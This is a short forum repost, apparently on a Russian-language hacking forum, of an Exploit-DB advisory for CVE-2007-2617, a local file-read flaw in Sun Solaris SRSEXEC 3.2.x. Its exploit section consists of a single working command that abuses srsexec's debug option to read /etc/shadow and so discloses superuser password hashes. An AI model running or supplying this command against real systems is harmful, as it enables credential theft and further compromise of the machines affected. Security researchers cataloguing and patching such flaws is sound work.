Exploit Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
30021
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
LOCAL
Платформа
SOLARIS
CVE
cve-2007-2617
Дата публикации
2007-05-10
Код:
source: https://www.securityfocus.com/bid/23915/info

Sun Microsystems Solaris is prone to a local information-disclosure vulnerability due to a design error.

A local attacker may exploit this issue to access sensitive information, including superuser password information, that may lead to further attacks. A complete compromise is possible. 

The following exploit example is available:
$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED
 
Источник
www.exploit-db.com

Похожие темы